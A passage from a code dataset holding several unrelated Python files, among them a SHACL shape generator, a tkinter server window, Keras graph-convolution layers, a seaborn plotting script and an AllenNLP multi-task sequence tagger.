print(\"## else condition for self.CLASSES[x]['label'] \" + x + \" line 128 of file shaclgen.py\")\n\n if len(self.PROPS[p]['classes']) == 1:\n self.PROPS[p]['type'] = 'unique'\n\n else:\n self.PROPS[p]['type'] = 'repeat'\n\n def extract_contraints(self):\n self.extract_props()\n print(\"INFO: Props extraction finished...\")\n pbarInCon = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval=len(self.PROPS_NEW.keys()))\n print(\"Iterating over extracted Properties\")\n count = 0\n for prop in pbarInCon(self.PROPS_NEW.keys()):\n print(count)\n types = []\n for s, p, o in self.G.triples((None, self.PROPS_NEW[prop]['path'], None)):\n types.append(type(o))\n if len(set(types)) == 1:\n if types[0] == URIRef:\n self.PROPS_NEW[prop]['nodekind'] = 'IRI'\n elif types[0] == BNode:\n self.PROPS_NEW[prop]['nodekind'] = 'BNode'\n elif types[0] == Literal:\n self.PROPS_NEW[prop]['nodekind'] = 'Literal'\n count = count + 1\n\n def gen_graph(self, serial='turtle', graph_format=None, namespace=None, verbose=None):\n # self.extract_props()\n print(\"INFO: gen_graph begin .....\")\n self.gen_prefix_bindings()\n print(\"INFO: gen prefix bindings finished\")\n self.extract_contraints()\n print(\"INFO: extract_constraints finished\")\n print(\"INFO: now creating SHACL shapes...\")\n ng = rdflib.Graph()\n SH = Namespace('http://www.w3.org/ns/shacl#')\n ng.bind('sh', SH)\n\n for x in self.namespaces:\n ng.bind(x[0], x[1])\n\n if namespace != None:\n if self.uri_validator(namespace[0]) != False:\n uri = namespace[0]\n if namespace[0][-1] not in ['#', '/', '\\\\']:\n uri = namespace[0] + '#'\n EX = Namespace(uri)\n ng.bind(namespace[1], EX)\n else:\n print('##malformed URI, using http://example.org/ instead...')\n EX = Namespace('http://www.example.org/')\n ng.bind('ex', EX)\n else:\n EX = Namespace('http://www.example.org/')\n ng.bind('ex', EX)\n\n for c in self.CLASSES.keys():\n label = self.CLASSES[c]['label']\n ng.add((EX[label], RDF.type, SH.NodeShape))\n ng.add((EX[label], SH.targetClass, c))\n ng.add((EX[label], SH.nodeKind, SH.BlankNodeOrIRI))\n\n for p in self.PROPS_NEW.keys():\n ng.add((EX[self.PROPS_NEW[p]['label']], RDF.type, SH.PropertyShape))\n ng.add((EX[self.PROPS_NEW[p]['label']], SH.path, self.PROPS_NEW[p]['path']))\n # ng.add((EX[self.PROPS_NEW[p]['label']], RDF.type, SH.PropertyShape))\n # ng.add((EX[self.PROPS_NEW[p]['label']], SH.path, p))\n #\n for class_prop in self.PROPS_NEW[p]['classes']:\n ng.add((EX[class_prop], SH.property, EX[self.PROPS_NEW[p]['label']]))\n if self.PROPS_NEW[p]['nodekind'] == 'IRI':\n ng.add((EX[self.PROPS_NEW[p]['label']], SH.nodeKind, SH.IRI))\n elif self.PROPS_NEW[p]['nodekind'] == 'BNode':\n ng.add((EX[self.PROPS_NEW[p]['label']], SH.nodeKind, SH.BlankNode))\n elif self.PROPS_NEW[p]['nodekind'] == 'Literal':\n ng.add((EX[self.PROPS_NEW[p]['label']], SH.nodeKind, SH.Literal))\n\n # datetime object containing current date and time\n now = datetime.now()\n print(\"now =\", now)\n\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"resources/SHACL_SHAPES_%H_%M_%S_%d_%m_%Y.ttl\")\n print(\"date and time =\", dt_string)\n\n print(ng.serialize(format=serial).decode())\n f = open(dt_string, \"x\")\n f.write(ng.serialize(format=serial).decode())\n f.close()\n","sub_path":"shaclgen/shaclgen.py","file_name":"shaclgen.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"268276561","text":"from tkinter import *\nfrom lib.server import Server\nfrom socket import *\nfrom lib.threads import MyServerThread\n\n\nclass ServerWindow: # -> графический объект Окно сервера\n def __init__(self):\n self.__root = Tk() # -> корневое окно\n self.__frame = Frame(self.__root) # -> фрейм для виджетов\n self.__label = Label(self.__frame) # -> отображает ip сервера\n self.__chat = Label(self.__frame) # -> для вывода сообщений\n\n self.__host = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close())\n for s in [socket(AF_INET, SOCK_DGRAM)]][0][1] # -> получение ip\n\n self.__port = 9001 # номер порта\n self.__server = Server(self.__host, self.__port) # -> создание объекта класса Server\n self.__server_thread = MyServerThread(self.__server, self.__chat) # -> создание потока\n\n def config(self): # -> параметры окна и виджетов\n self.__root.title('Серверный модуль')\n self.__root.geometry('500x700+700+50')\n self.__root.config(bg='PaleTurquoise')\n self.__root.resizable(True, False)\n\n self.__label.config(text=str(self.__host), font='Arial 12 bold', fg='SteelBlue')\n self.__chat.config(text=str(self.__host), font='Arial 10', fg='navy', justify=LEFT, width=100, wraplength=400)\n\n def layout(self): # -> размещение виджетов\n self.__frame.pack(pady=15, padx=15)\n self.__label.pack(padx=15)\n self.__chat.pack(pady=15, padx=15)\n\n def open(self): # -> запускает объект данного класса\n self.config()\n self.layout()\n self.__server_thread.daemon = True # -> объявляет поток демоническим\n\n self.__server_thread.start()\n self.__root.mainloop()\n","sub_path":"gui/server_window.py","file_name":"server_window.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"253818717","text":"import os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nfrom common.traincbox import *\n\nimport time\nimport threading\n\n\ndef mymonitorabox(number, workerabox):\n logger.info('create a A%d box monitor.' % number)\n workerabox.addtraintaskMonitor()\n\nif __name__ == '__main__':\n workerAbox = []\n logger.info('start monitor a box for training tasks.')\n\n for i in range(CBOX['Am']):\n workerAbox.append(TrainCBox('A', i+ 1))\n # workerAbox[i].connectZK()\n # workerAbox[i].startZK()\n\n while True:\n for i in range(CBOX['Am']):\n workerAbox[i].connectZK()\n workerAbox[i].startZK()\n\n for i in range(CBOX['Am']):\n t = threading.Thread(target=mymonitorabox(i, workerAbox[i]))\n t.start()\n t.join()\n\n for i in range(CBOX['Am']):\n workerAbox[i].stopZK()\n\n time.sleep(20)\n\n # for i in range(CBOX['Am']):\n # workerAbox[i].stopZK()\n","sub_path":"trainbox/monitorabox.py","file_name":"monitorabox.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"145375801","text":"import sys\nimport inspect\n\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras import backend as K\n\nfrom nw2vec import codecs\n\n\nclass GC(keras.layers.Layer):\n\n def __init__(self,\n units,\n activation=None,\n use_bias=True,\n gather_mask=False,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n **kwargs):\n super(GC, self).__init__(**kwargs)\n self.units = units\n self.activation = keras.activations.get(activation)\n self.use_bias = use_bias\n self.gather_mask = gather_mask\n self.kernel_initializer = keras.initializers.get(kernel_initializer)\n self.bias_initializer = keras.initializers.get(bias_initializer)\n self.kernel_regularizer = keras.regularizers.get(kernel_regularizer)\n self.bias_regularizer = keras.regularizers.get(bias_regularizer)\n self.activity_regularizer = keras.regularizers.get(activity_regularizer)\n self.kernel_constraint = keras.constraints.get(kernel_constraint)\n self.bias_constraint = keras.constraints.get(bias_constraint)\n self.input_spec = [keras.engine.InputSpec(ndim=2),\n keras.engine.InputSpec(ndim=1),\n keras.engine.InputSpec(ndim=2)]\n self.supports_masking = False\n\n def build(self, input_shapes):\n adj_shape, mask_shape, features_shape = input_shapes\n\n assert len(adj_shape) == 2\n assert len(mask_shape) == 1\n assert len(features_shape) == 2\n\n n_nodes = adj_shape[0]\n features_dim = features_shape[1]\n\n self.kernel = self.add_weight(shape=(features_dim, self.units),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n if self.use_bias:\n self.bias = self.add_weight(shape=(self.units,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.bias = None\n self.input_spec = [keras.engine.InputSpec(ndim=2, axes={0: n_nodes, 1: n_nodes}),\n keras.engine.InputSpec(ndim=1, axes={0: n_nodes}),\n keras.engine.InputSpec(ndim=2, axes={0: n_nodes, 1: features_dim})]\n super(GC, self).build(input_shapes)\n\n def call(self, inputs):\n adj, mask, features = inputs\n\n A_tilde = tf.sparse_add(adj, tf.eye(tf.shape(adj)[0], dtype=K.floatx()))\n D_tilde_out_inv_sqrt = tf.matrix_diag(1.0 / K.sqrt(K.sum(A_tilde, axis=0)))\n D_tilde_in_inv_sqrt = tf.matrix_diag(1.0 / K.sqrt(K.sum(A_tilde, axis=1)))\n A_hat = D_tilde_out_inv_sqrt @ A_tilde @ D_tilde_in_inv_sqrt\n\n output = tf.matmul(A_hat, features @ self.kernel, a_is_sparse=True)\n if self.use_bias:\n output = K.bias_add(output, self.bias)\n if self.activation is not None:\n output = self.activation(output)\n if self.gather_mask:\n output = tf.boolean_mask(output, mask)\n else:\n output = output * K.expand_dims(mask, -1)\n return output\n\n def compute_output_shape(self, input_shapes):\n adj_shape, mask_shape, features_shape = input_shapes\n assert len(adj_shape) == 2\n assert len(mask_shape) == 1\n assert len(features_shape) == 2\n\n return (None, self.units)\n\n def get_config(self):\n config = {\n 'units': self.units,\n 'activation': keras.activations.serialize(self.activation),\n 'use_bias': self.use_bias,\n 'gather_mask': self.gather_mask,\n 'kernel_initializer': keras.initializers.serialize(self.kernel_initializer),\n 'bias_initializer': keras.initializers.serialize(self.bias_initializer),\n 'kernel_regularizer': keras.regularizers.serialize(self.kernel_regularizer),\n 'bias_regularizer': keras.regularizers.serialize(self.bias_regularizer),\n 'activity_regularizer': keras.regularizers.serialize(self.activity_regularizer),\n 'kernel_constraint': keras.constraints.serialize(self.kernel_constraint),\n 'bias_constraint': keras.constraints.serialize(self.bias_constraint)\n }\n base_config = super(GC, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n @classmethod\n def from_config(cls, config, custom_objects=None):\n # Recover any numpy array arguments\n config = config.copy()\n for key in config:\n if isinstance(config[key], dict):\n if 'type' in config[key] and config[key]['type'] == 'ndarray':\n config[key] = np.array(config[key]['value'])\n\n return cls(**config)\n\n\nclass Bilinear(keras.layers.Layer):\n\n def __init__(self,\n bilin_axis,\n fixed_kernel=None,\n fixed_bias=None,\n activation=None,\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n call_impl='whileloop', # set to \"tensordot\" to revert to the old implementation\n **kwargs):\n if 'input_shape' not in kwargs and 'input_dim' in kwargs:\n kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n\n # Validate arguments\n if fixed_bias is not None:\n assert use_bias\n\n super(Bilinear, self).__init__(**kwargs)\n self.bilin_axis = bilin_axis\n self.fixed_kernel = fixed_kernel\n self.fixed_bias = fixed_bias\n self.activation = keras.activations.get(activation)\n self.use_bias = use_bias\n self.kernel_initializer = keras.initializers.get(kernel_initializer)\n self.bias_initializer = keras.initializers.get(bias_initializer)\n self.kernel_regularizer = keras.regularizers.get(kernel_regularizer)\n self.bias_regularizer = keras.regularizers.get(bias_regularizer)\n self.activity_regularizer = keras.regularizers.get(activity_regularizer)\n self.kernel_constraint = keras.constraints.get(kernel_constraint)\n self.bias_constraint = keras.constraints.get(bias_constraint)\n assert call_impl in ['whileloop', 'tensordot']\n self.call_impl = call_impl\n self.input_spec = [keras.engine.InputSpec(min_ndim=2, max_ndim=3)] * 2\n self.supports_masking = False\n\n def _process_input_shapes(self, input_shapes):\n if not isinstance(input_shapes, list) or len(input_shapes) != 2:\n raise ValueError('A `Bilinear` layer should be called '\n 'on a list of 2 inputs.')\n # The two tensors must have the same shape\n assert input_shapes[0] == input_shapes[1]\n shape = input_shapes[0]\n assert len(shape) in [2, 3]\n\n # Check the reduction axis is not the bilinear axis\n bilin_axis = self.bilin_axis % len(shape)\n if len(shape) == 3:\n assert bilin_axis in [0, 1]\n else:\n assert bilin_axis == 0\n\n # Get the diag_axis if it exists\n if len(shape) == 3:\n diag_axis = 1 - bilin_axis\n else:\n diag_axis = None\n\n return bilin_axis, diag_axis, shape[-1]\n\n def build(self, input_shapes):\n bilin_axis, _, input_dim = self._process_input_shapes(input_shapes)\n\n if self.fixed_kernel is not None:\n self.kernel = K.constant(self.fixed_kernel)\n else:\n self.kernel = self.add_weight(shape=(input_dim, input_dim),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n if self.use_bias:\n if self.fixed_bias is not None:\n self.bias = K.constant(self.fixed_bias)\n else:\n self.bias = self.add_weight(shape=(),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.bias = None\n\n self.input_spec = [keras.layers.InputSpec(min_ndim=2, max_ndim=3,\n axes={-1: input_dim})] * 2\n super(Bilinear, self).build(input_shapes)\n\n def call(self, inputs):\n if self.call_impl == 'whileloop':\n return self.call_whileloop(inputs)\n else:\n return self.call_tensordot(inputs)\n\n def call_whileloop(self, inputs):\n tensor0, tensor1 = inputs\n bilin_axis, diag_axis, _ = self._process_input_shapes([tensor0.shape, tensor1.shape])\n assert bilin_axis in [0, 1]\n assert (diag_axis is None) or (diag_axis == 1 - bilin_axis)\n bilin_dim, diag_dim = tensor0.shape[bilin_axis], tensor0.shape[diag_axis]\n if isinstance(bilin_dim, tf.Dimension):\n bilin_dim = bilin_dim.value\n if isinstance(diag_dim, tf.Dimension):\n diag_dim = diag_dim.value\n\n K_tensor1 = tf.tensordot(tensor1, self.kernel, axes=[[-1], [1]])\n if diag_axis is None:\n assert len(tensor0.shape) == len(tensor1.shape) == 2\n output = tf.tensordot(tensor0, K_tensor1, axes=[[-1], [-1]])\n else:\n\n def diag_slice(k):\n idx = [0.0, 0.0, slice(None)]\n idx[diag_axis] = k\n idx[bilin_axis] = slice(None)\n return idx\n\n def counter(i, t):\n return i < diag_dim\n\n def body(i, t):\n idx = diag_slice(i)\n slice_dot = tf.tensordot(tensor0[idx], K_tensor1[idx], axes=[[-1], [-1]])\n return (i + 1, tf.concat([t, K.expand_dims(slice_dot, 0)], axis=0))\n\n i0 = K.constant(0, dtype=tf.int32)\n if bilin_dim is None:\n bilin_dim_dyn = tf.shape(tensor0)[bilin_axis]\n out0 = K.zeros((0, bilin_dim_dyn, bilin_dim_dyn))\n else:\n out0 = K.zeros((0, bilin_dim, bilin_dim))\n\n _, output = tf.while_loop(\n counter, body, loop_vars=[i0, out0],\n shape_invariants=[i0.get_shape(), tf.TensorShape([None, bilin_dim, bilin_dim])]\n )\n\n if self.use_bias:\n output = output + self.bias\n if self.activation is not None:\n output = self.activation(output)\n output = K.expand_dims(output, 0)\n return output\n\n def call_tensordot(self, inputs):\n tensor0, tensor1 = inputs\n bilin_axis, diag_axis, _ = self._process_input_shapes([tensor0.shape, tensor1.shape])\n\n Q_tensor1 = tf.tensordot(tensor1, self.kernel, axes=[[-1], [1]])\n output = tf.tensordot(tensor0, Q_tensor1, axes=[[-1], [-1]])\n if diag_axis is not None:\n # Dynamically check that both tensors have the same dimension in diag_axis\n with tf.control_dependencies(\n [tf.assert_equal(tf.shape(tensor0)[diag_axis], tf.shape(tensor1)[diag_axis])]):\n # Put the bilinear axes first and the diagonal axes last\n output = tf.transpose(output,\n perm=[bilin_axis, 2 + bilin_axis, diag_axis, 2 + diag_axis])\n # Take the diagonal elements for the diagonal axes\n output = tf.matrix_diag_part(output)\n # Put the reduced diagonal axis first, the bilinear axes last\n output = tf.transpose(output, perm=[2, 0, 1])\n\n if self.use_bias:\n output = output + self.bias\n if self.activation is not None:\n output = self.activation(output)\n output = K.expand_dims(output, 0)\n return output\n\n def compute_output_shape(self, input_shapes):\n bilin_axis, diag_axis, _ = self._process_input_shapes(input_shapes)\n axes = ([] if len(input_shapes[0]) == 2 else [(0, diag_axis)]\n + [(0, bilin_axis), (1, bilin_axis)])\n return ((1,) + tuple([input_shapes[tensor][ax] if ax is not None else None\n for tensor, ax in axes]))\n\n def get_config(self):\n config = {\n 'bilin_axis': self.bilin_axis,\n 'fixed_kernel': self.fixed_kernel,\n 'fixed_bias': self.fixed_bias,\n 'activation': keras.activations.serialize(self.activation),\n 'use_bias': self.use_bias,\n 'kernel_initializer': keras.initializers.serialize(self.kernel_initializer),\n 'bias_initializer': keras.initializers.serialize(self.bias_initializer),\n 'kernel_regularizer': keras.regularizers.serialize(self.kernel_regularizer),\n 'bias_regularizer': keras.regularizers.serialize(self.bias_regularizer),\n 'activity_regularizer': keras.regularizers.serialize(self.activity_regularizer),\n 'kernel_constraint': keras.constraints.serialize(self.kernel_constraint),\n 'bias_constraint': keras.constraints.serialize(self.bias_constraint)\n }\n base_config = super(Bilinear, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n @classmethod\n def from_config(cls, config, custom_objects=None):\n # Recover any numpy array arguments\n config = config.copy()\n for key in config:\n if isinstance(config[key], dict):\n if 'type' in config[key] and config[key]['type'] == 'ndarray':\n config[key] = np.array(config[key]['value'])\n\n return cls(**config)\n\n\nclass ParametrisedStochastic(keras.layers.Lambda):\n\n def __init__(self, codec_name, n_samples, **kwargs):\n self.codec_name = codec_name\n self.n_samples = n_samples\n\n def sampler(params):\n return codecs.get(codec_name, params).stochastic_value(n_samples)\n\n super(ParametrisedStochastic, self).__init__(sampler, **kwargs)\n\n def compute_output_shape(self, input_shape):\n codec_output_shape = codecs.available_codecs()[self.codec_name]\\\n .compute_output_shape(input_shape)\n return codec_output_shape[:-1] + (self.n_samples,) + codec_output_shape[-1:]\n\n def get_config(self):\n config = {\n 'codec_name': self.codec_name,\n 'n_samples': self.n_samples\n }\n # Skip the Lambda-specific config parameters as we recreate the Lambda layer ourselves\n base_config = super(keras.layers.Lambda, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n @classmethod\n def from_config(cls, config, custom_objects=None):\n # Recover any numpy array arguments\n config = config.copy()\n for key in config:\n if isinstance(config[key], dict):\n if 'type' in config[key] and config[key]['type'] == 'ndarray':\n config[key] = np.array(config[key]['value'])\n\n return cls(**config)\n\n\ndef available_layers():\n return dict(\n inspect.getmembers(sys.modules[__name__],\n lambda m: inspect.isclass(m) and issubclass(m, keras.layers.Layer))\n )\n","sub_path":"nw2vec/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":16224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"418807654","text":"import numpy as np\nimport pandas as pd\nfrom pandas import Series,DataFrame\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nanscombe=sns.load_dataset(\"anscombe\",engine=\"python\")\nprint(anscombe)\n\nsns.set(style=\"ticks\", color_codes=True)\n\ngrid = sns.lmplot(x=\"x\",y=\"y\",data=anscombe,hue=\"dataset\",col=\"dataset\",col_wrap=2)\n\ngrid.axes[0].set_ylabel(\"y\", size=20)\ngrid.axes[2].set_ylabel(\"y\", size=20)\ngrid.axes[2].set_xlabel(\"x\", size=20)\ngrid.axes[3].set_xlabel(\"x\", size=20)\ngrid.set_titles(\"{col_name}\", size=20)\n\ngrid.axes[0].tick_params(labelsize=20)\ngrid.axes[2].tick_params(labelsize=20)\ngrid.axes[3].tick_params(labelsize=20)\n\nplt.show()","sub_path":"datasOf2019/anscomb.py","file_name":"anscomb.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192822914","text":"from typing import Dict, Optional\n\nfrom IPython import embed\nimport numpy\nfrom overrides import overrides\nimport torch\nfrom torch.nn.modules.linear import Linear\nimport torch.nn.functional as F\nfrom collections import OrderedDict\n\nfrom allennlp.common import Params\nfrom allennlp.common.checks import check_dimensions_match\nfrom allennlp.data import Vocabulary\nfrom allennlp.modules import Seq2SeqEncoder, TimeDistributed, TextFieldEmbedder, ConditionalRandomField\nfrom allennlp.models.model import Model\nfrom allennlp.nn import InitializerApplicator, RegularizerApplicator\nfrom allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits\nfrom allennlp.training.metrics import CategoricalAccuracy, SpanBasedF1Measure\n\n\n@Model.register(\"multi_tagger\")\nclass MultiTagger(Model):\n \"\"\"\n This ``MultiTagger`` encodes a sequence of text with a stacked ``Seq2SeqEncoder``, then\n predicts multiple tags for each token in the sequence.\n\n Parameters\n ----------\n vocab : ``Vocabulary``, required\n A Vocabulary, required in order to compute sizes for input/output projections.\n tasks : ``str``, required\n A list of task names\n domains : ``str``, required\n A list of domain names\n text_field_embedder : ``TextFieldEmbedder``, required\n Used to embed the ``tokens`` ``TextField`` we get as input to the model.\n stacked_encoder : ``Seq2SeqEncoder``\n The encoder (with its own internal stacking) that we will use in between embedding tokens\n and predicting output tags.\n source_namespace : ``str``, optional (default=``tokens``)\n namespace for vocab of source sentences\n label_suffix_namespace : ``str``, optional (default=``labels``)\n task_name + '_' + label_suffix_namespace is the namespace for vocab of tags for each task\n is_crf : bool, optional (default=``False``)\n Use conditional random field loss instead of the standard softmax\n initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``)\n Used to initialize the model parameters.\n regularizer : ``RegularizerApplicator``, optional (default=``None``)\n If provided, will be used to calculate the regularization penalty during training.\n \"\"\"\n\n def __init__(self, vocab: Vocabulary,\n tasks: str,\n domains: str,\n text_field_embedder: TextFieldEmbedder,\n stacked_encoder: Seq2SeqEncoder,\n source_namespace: str = \"tokens\",\n label_suffix_namespace: str = \"labels\",\n is_crf: bool = False,\n initializer: InitializerApplicator = InitializerApplicator(),\n regularizer: Optional[RegularizerApplicator] = None) -> None:\n super(MultiTagger, self).__init__(vocab, regularizer)\n self.tasks = tasks\n self.domains = domains\n # Create task-to-ID and domain-to-ID mappings\n self.task_to_id = {}\n for i, tsk in enumerate(tasks):\n self.task_to_id[tsk] = i\n self.domain_to_id = {}\n for i, dmn in enumerate(domains):\n self.domain_to_id[dmn] = i\n self.source_namespace = source_namespace\n self.label_suffix_namespace = label_suffix_namespace\n self.text_field_embedder = text_field_embedder\n self.stacked_encoder = stacked_encoder\n self.label_namespaces = OrderedDict()\n self.tag_projection_layer = OrderedDict()\n self.num_classes = OrderedDict()\n self.is_crf = is_crf\n self.crf = OrderedDict()\n self.metrics = OrderedDict()\n self.span_metric = OrderedDict()\n for tsk in self.tasks:\n task_label_namespace = tsk + '_' + label_suffix_namespace\n self.label_namespaces[tsk] = task_label_namespace\n self.num_classes[tsk] = self.vocab.get_vocab_size(task_label_namespace)\n self.tag_projection_layer[tsk] = TimeDistributed(Linear(self.stacked_encoder.get_output_dim(),\n self.num_classes[tsk]))\n if is_crf:\n self.crf[tsk] = ConditionalRandomField(self.num_classes[tsk])\n self.metrics[tsk] = {\n \"accuracy\": CategoricalAccuracy(),\n \"accuracy3\": CategoricalAccuracy(top_k=3)\n }\n self.span_metric[tsk] = SpanBasedF1Measure(vocab, tag_namespace=task_label_namespace)\n self.tag_projection_layer = torch.nn.Sequential(self.tag_projection_layer)\n if is_crf:\n self.crf = torch.nn.Sequential(self.crf)\n check_dimensions_match(text_field_embedder.get_output_dim(), stacked_encoder.get_input_dim(),\n \"text field embedding dim\", \"encoder input dim\")\n initializer(self)\n\n def _examine_source_indices(self, preindices):\n if not isinstance(preindices, numpy.ndarray):\n preindices = preindices.data.cpu().numpy()\n all_predicted_tokens = []\n for indices in preindices:\n predicted_tokens = [self.vocab.get_token_from_index(\n x, namespace=self.source_namespace) for x in list(indices)]\n all_predicted_tokens.append(predicted_tokens)\n return all_predicted_tokens\n\n def _examine_target_indices(self, tsk, preindices):\n if not isinstance(preindices, numpy.ndarray):\n preindices = preindices.data.cpu().numpy()\n all_predicted_tokens = []\n for indices in preindices:\n indices = list(indices)\n # Collect indices till the first end_symbol\n # if self._end_index in indices:\n # indices = indices[:indices.index(self._end_index)]\n predicted_tokens = [self.vocab.get_token_from_index(\n x, namespace=self.label_namespaces[tsk]) for x in indices]\n all_predicted_tokens.append(predicted_tokens)\n return all_predicted_tokens\n\n def _print_source_target_triplets(self, tsk, src, tgt, true_tgt):\n src = self._examine_source_indices(src)\n true_tgt = self._examine_target_indices(tsk, true_tgt)\n tgt = self._examine_target_indices(tsk, tgt)\n for i in [0, int(len(src)/2), -1]:\n print('Source: ', ' '.join(src[i]))\n print('Target: ', ' '.join(tgt[i]))\n print('True target: ', ' '.join(true_tgt[i]))\n print('')\n\n def task_forward(self,\n tsk_id,\n tsk,\n tokens: Dict[str, torch.LongTensor],\n tags: torch.LongTensor = None) -> Dict[str, torch.Tensor]:\n embedded_text_input = self.text_field_embedder(tokens)\n mask = get_text_field_mask(tokens)\n encoded_text = self.stacked_encoder(embedded_text_input, mask)\n logits = self.tag_projection_layer[tsk_id].forward(encoded_text) # (batch_size, sequence_length, num_classes)\n if self.is_crf:\n predicted_tags = self.crf[tsk_id].viterbi_tags(logits, mask)\n else:\n reshaped_log_probs = logits.view(-1, self.num_classes[tsk])\n batch_size, sequence_length, _ = embedded_text_input.size()\n class_probabilities = F.softmax(reshaped_log_probs, dim=-1).view(\n [batch_size, sequence_length, self.num_classes[tsk]])\n all_predictions = class_probabilities.cpu().data.numpy()\n if all_predictions.ndim == 3:\n predictions_list = [all_predictions[i] for i in range(all_predictions.shape[0])]\n else:\n predictions_list = [all_predictions]\n predicted_tags = []\n for predictions in predictions_list:\n argmax_indices = numpy.argmax(predictions, axis=-1)\n predicted_tags.append(argmax_indices)\n output_dict = {\"logits\": logits,\n \"tags\": predicted_tags,\n \"mask\": mask}\n if tags is not None:\n loss = 0.0\n if self.is_crf:\n log_likelihood = self.crf[tsk_id](logits, tags, mask)\n loss = -log_likelihood\n else:\n loss = sequence_cross_entropy_with_logits(logits, tags, mask)\n for metric in self.metrics[tsk].values():\n metric(logits, tags, mask.float())\n output_dict[\"loss\"] = loss\n\n # Represent viterbi tags as \"class probabilities\" that we can\n # feed into the `span_metric`\n class_probabilities = logits * 0.\n for i, instance_tags in enumerate(predicted_tags):\n for j, tag_id in enumerate(instance_tags):\n class_probabilities[i, j, tag_id] = 1\n self.span_metric[tsk](class_probabilities, tags, mask)\n self._print_source_target_triplets(tsk, tokens['tokens'], numpy.array(predicted_tags), tags)\n return output_dict\n\n @overrides\n def forward(self, # type: ignore\n task_token: torch.LongTensor,\n domain_token: torch.LongTensor,\n tokens: Dict[str, torch.LongTensor],\n all_tags: torch.LongTensor) -> Dict[str, torch.Tensor]:\n # pylint: disable=arguments-differ\n \"\"\"\n Parameters\n ----------\n tokens : Dict[str, torch.LongTensor], required\n The output of ``TextField.as_array()``, which should typically be passed directly to a\n ``TextFieldEmbedder``. This output is a dictionary mapping keys to ``TokenIndexer``\n tensors. At its most basic, using a ``SingleIdTokenIndexer`` this is: ``{\"tokens\":\n Tensor(batch_size, num_tokens)}``. This dictionary will have the same keys as were used\n for the ``TokenIndexers`` when you created the ``TextField`` representing your\n sequence. The dictionary is designed to be passed directly to a ``TextFieldEmbedder``,\n which knows how to combine different word representations into a single vector per\n token in your input.\n *_tags : torch.LongTensor, optional (default = None)\n A torch tensor representing the sequence of integer gold class labels of shape\n ``(batch_size, num_tokens)``.\n\n Returns\n -------\n An output dictionary consisting of:\n logits : torch.FloatTensor\n A tensor of shape ``(batch_size, num_tokens, tag_vocab_size)`` representing\n unnormalised log probabilities of the tag classes.\n class_probabilities : torch.FloatTensor\n A tensor of shape ``(batch_size, num_tokens, tag_vocab_size)`` representing\n a distribution of the tag classes per word.\n loss : torch.FloatTensor, optional\n A scalar loss to be optimised.\n\n \"\"\"\n # num_tasks = all_tags.size(1)\n batch_size = task_token.shape[0]\n predictions = [[]] * batch_size\n label_namespaces = [''] * batch_size\n loss = 0.0\n task_ids = []\n for tt in task_token.squeeze().data.cpu().numpy():\n # map task token to strings\n # map strings to ind\n task_ids.append(self.task_to_id[self.vocab.get_token_from_index(tt, 'task_labels')])\n task_ids = numpy.array(task_ids)\n # batch_one = False\n\n for i, tsk in enumerate(self.tasks):\n # For each element in tokens (tokens, token_characters, etc.),\n # select only the relevant data in the minibatch\n task_indices = (task_ids == i).nonzero()[0]\n print(i, task_indices)\n if task_indices.shape[0] < 1:\n continue\n # elif task_indices.shape[0] == 1:\n # task_indices = numpy.concatenate((task_indices, task_indices), axis=0)\n task_tokens = {}\n for k in tokens:\n if task_indices.shape[0] > 1:\n task_tokens[k] = tokens[k][task_indices, :].squeeze()\n else:\n task_tokens[k] = tokens[k][task_indices, :]\n task_all_tags = all_tags[:, i, :].squeeze(dim=1)\n if task_indices.shape[0] > 1:\n task_all_tags = task_all_tags[task_indices, :].squeeze().contiguous()\n else:\n task_all_tags = task_all_tags[task_indices, :].contiguous()\n # embed()\n task_output_dict = self.task_forward(i, tsk, task_tokens, task_all_tags)\n task_tags = task_output_dict['tags']\n for j, ti in enumerate(task_indices):\n predictions[ti] = task_tags[j]\n label_namespaces[ti] = tsk\n loss += task_output_dict['loss']\n # if task_indices.shape[0] == 1:\n # batch_one = True\n # if batch_one:\n # embed()\n output_dict = {'loss': loss,\n 'tags': predictions,\n 'label_namespaces': label_namespaces}\n return output_dict\n\n def task_decode(self, tsk, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n output_dict[\"tags\"] = [\n [self.vocab.get_token_from_index(tag, namespace=self.label_namespaces[tsk])\n for tag in instance_tags]\n for instance_tags in 